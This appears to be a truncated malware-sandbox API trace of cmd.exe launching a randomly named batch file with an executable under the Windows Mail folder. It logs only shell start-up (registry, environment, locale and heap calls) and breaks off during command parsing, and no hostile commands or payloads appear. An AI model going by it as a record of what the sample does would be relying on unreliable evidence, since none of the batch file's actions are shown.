SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0204.508] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0204.508] GetCurrentThreadId () returned 0xa04 [0204.508] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa04) returned 0x60 [0204.508] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0204.508] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0204.509] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.509] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.509] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x45f8ac | out: phkResult=0x45f8ac*=0x0) returned 0x2 [0204.510] VirtualQuery (in: lpAddress=0x45f8e3, lpBuffer=0x45f87c, dwLength=0x1c | out: lpBuffer=0x45f87c*(BaseAddress=0x45f000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.510] VirtualQuery (in: lpAddress=0x360000, lpBuffer=0x45f87c, dwLength=0x1c | out: lpBuffer=0x45f87c*(BaseAddress=0x360000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.510] VirtualQuery (in: lpAddress=0x361000, lpBuffer=0x45f87c, dwLength=0x1c | out: lpBuffer=0x45f87c*(BaseAddress=0x361000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.510] VirtualQuery (in: lpAddress=0x363000, lpBuffer=0x45f87c, dwLength=0x1c | out: lpBuffer=0x45f87c*(BaseAddress=0x363000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.510] VirtualQuery (in: lpAddress=0x460000, lpBuffer=0x45f87c, dwLength=0x1c | out: lpBuffer=0x45f87c*(BaseAddress=0x460000, AllocationBase=0x460000, AllocationProtect=0x2, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.510] GetConsoleOutputCP () returned 0x1b5 [0204.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0204.511] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0204.511] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.511] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.511] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.511] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0204.512] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.512] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.512] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.512] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0204.513] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.513] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.513] GetEnvironmentStringsW () returned 0x8720d0* [0204.514] GetProcessHeap () returned 0x860000 [0204.514] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xaca) returned 0x872ba8 [0204.514] FreeEnvironmentStringsW (penv=0x8720d0) returned 1 [0204.514] GetProcessHeap () returned 0x860000 [0204.514] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x4) returned 0x871870 [0204.514] GetEnvironmentStringsW () returned 0x8720d0* [0204.515] GetProcessHeap () returned 0x860000 [0204.515] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xaca) returned 0x873680 [0204.515] FreeEnvironmentStringsW (penv=0x8720d0) returned 1 [0204.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45e81c | out: phkResult=0x45e81c*=0x68) returned 0x0 [0204.515] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x0, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.515] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x1, lpcbData=0x45e820*=0x4) returned 0x0 [0204.515] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x1, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x0, lpcbData=0x45e820*=0x4) returned 0x0 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x40, lpcbData=0x45e820*=0x4) returned 0x0 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x40, lpcbData=0x45e820*=0x4) returned 0x0 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x40, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.516] RegCloseKey (hKey=0x68) returned 0x0 [0204.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45e81c | out: phkResult=0x45e81c*=0x68) returned 0x0 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x40, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x1, lpcbData=0x45e820*=0x4) returned 0x0 [0204.516] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x1, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x0, lpcbData=0x45e820*=0x4) returned 0x0 [0204.517] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x9, lpcbData=0x45e820*=0x4) returned 0x0 [0204.517] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x4, lpData=0x45e828*=0x9, lpcbData=0x45e820*=0x4) returned 0x0 [0204.517] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45e824, lpData=0x45e828, lpcbData=0x45e820*=0x1000 | out: lpType=0x45e824*=0x0, lpData=0x45e828*=0x9, lpcbData=0x45e820*=0x1000) returned 0x2 [0204.517] RegCloseKey (hKey=0x68) returned 0x0 [0204.517] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2e7 [0204.517] srand (_Seed=0x5f51e2e7) [0204.517] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\told.exe\"\"" [0204.517] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\told.exe\"\"" [0204.518] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0204.518] GetProcessHeap () returned 0x860000 [0204.518] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x210) returned 0x8720d0 [0204.518] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8720d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0204.519] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.519] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.519] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.519] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.519] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.519] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.519] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.519] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.519] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.520] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.520] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.520] GetProcessHeap () returned 0x860000 [0204.520] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x872ba8 | out: hHeap=0x860000) returned 1 [0204.520] GetEnvironmentStringsW () returned 0x8722e8* [0204.520] GetProcessHeap () returned 0x860000 [0204.520] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xae2) returned 0x874c48 [0204.520] FreeEnvironmentStringsW (penv=0x8722e8) returned 1 [0204.521] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.521] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.521] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.521] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.521] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.521] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.521] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.521] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.521] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.521] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.521] GetProcessHeap () returned 0x860000 [0204.521] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x54) returned 0x8717a0 [0204.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45f5e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0204.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x45f5e8, lpFilePart=0x45f5e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x45f5e4*="Desktop") returned 0x25 [0204.522] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0204.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x45f364 | out: lpFindFileData=0x45f364*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x875738 [0204.522] FindClose (in: hFindFile=0x875738 | out: hFindFile=0x875738) returned 1 [0204.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x45f364 | out: lpFindFileData=0x45f364*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x875738 [0204.522] FindClose (in: hFindFile=0x875738 | out: hFindFile=0x875738) returned 1 [0204.522] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0204.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x45f364 | out: lpFindFileData=0x45f364*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x875738 [0204.523] FindClose (in: hFindFile=0x875738 | out: hFindFile=0x875738) returned 1 [0204.523] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0204.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0204.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0204.523] GetProcessHeap () returned 0x860000 [0204.523] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x874c48 | out: hHeap=0x860000) returned 1 [0204.523] GetEnvironmentStringsW () returned 0x874158* [0204.523] GetProcessHeap () returned 0x860000 [0204.523] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xb36) returned 0x875f78 [0204.523] FreeEnvironmentStringsW (penv=0x874158) returned 1 [0204.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0204.523] GetProcessHeap () returned 0x860000 [0204.523] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x8717a0 | out: hHeap=0x860000) returned 1 [0204.524] GetProcessHeap () returned 0x860000 [0204.524] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400e) returned 0x876ab8 [0204.524] GetProcessHeap () returned 0x860000 [0204.524] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0xcc) returned 0x872e28 [0204.524] GetProcessHeap () returned 0x860000 [0204.524] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x4008) returned 0x87aad0 [0204.525] GetProcessHeap () returned 0x860000 [0204.525] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x4008) returned 0x87eae0 [0204.525] GetProcessHeap () returned 0x860000 [0204.525] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ab8 | out: hHeap=0x860000) returned 1 [0204.525] GetConsoleOutputCP () returned 0x1b5 [0205.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0205.051] GetUserDefaultLCID () returned 0x409 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x45f728, cchData=128 | out: lpLCData="0") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x45f728, cchData=128 | out: lpLCData="0") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x45f728, cchData=128 | out: lpLCData="1") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0205.052] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0205.052] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.054] GetProcessHeap () returned 0x860000 [0205.054] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x0, Size=0x20c) returned 0x872f00 [0205.054] GetConsoleTitleW (in: lpConsoleTitle=0x872f00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.054] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0205.055] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0205.055] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0205.056] GetProcessHeap () returned 0x860000 [0205.057] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x400a) returned 0x876ab8 [0205.057] GetProcessHeap () returned 0x860000 [0205.057] HeapFree (in: hHeap=0x860000, dwFlags=0x0, lpMem=0x876ab8 | out: hHeap=0x860000) returned 1 [0205.061] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0205.061] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0205.061] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0205.061] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0205.061] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0205.061] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0205.061] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0205.061] GetProcessHeap () returned 0x860000 [0205.062] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x58) returned 0x873118 [0205.062] GetProcessHeap () returned 0x860000 [0205.062] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x72) returned 0x882b08 [0205.064] GetProcessHeap () returned 0x860000 [0205.064] RtlAllocateHeap (HeapHandle=0x860000, Flags=0x8, Size=0x5c) returned 0x873178 [0205.066] GetConsoleTitleW (in: lpConsoleTitle=0x45f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.067] GetFileAttributesW (lpFileName="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\\"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat\"")) returned 0xffffffff [0205.068] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0205.068] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0205.068] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0205.068] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0205.068] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0205.068] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0205.068] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0205.068] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0205.068] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0205.068] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0205.068] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0205.068] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0205.068] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0205.069] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0205.069] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0205.069] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0205.069] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0205.069] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0205.069] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0205.069] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0205.069] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0205.069] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0205.069] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0205.069] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0205.069] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0205.069] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0205.070] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0205.070] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0205.070] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0205.070] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0205.070] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0205.070] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0205.070] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0205.070] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0205.070] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0205.070] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0205.070] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0205.070] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0205.070] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0205.070] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0205.071] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0205.071] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0205.071] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0205.071] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0205.071] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0205.071] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0205.071] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0205.071] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0205.071] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0205.071] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0205.071] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0205.071] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0205.071] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0205.071] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0205.072] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0205.072] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0205.072] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0205.072] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0205.072] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0205.072] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0205.072] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0205.072] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0205.072] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0205.072] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0205.072] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0205.072] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0205.072] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0205.072] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0205.072] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0205.072] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0205.073] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0205.073] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0205.073] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0205.073] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0205.073] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0205.073] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0205.073] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0205.073] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0205.073] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0205.073] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0205.073] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0205.073] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0205.073] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0205.073] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0205.074] _wcsicmp (_String1="\"C", _String2="FOR") 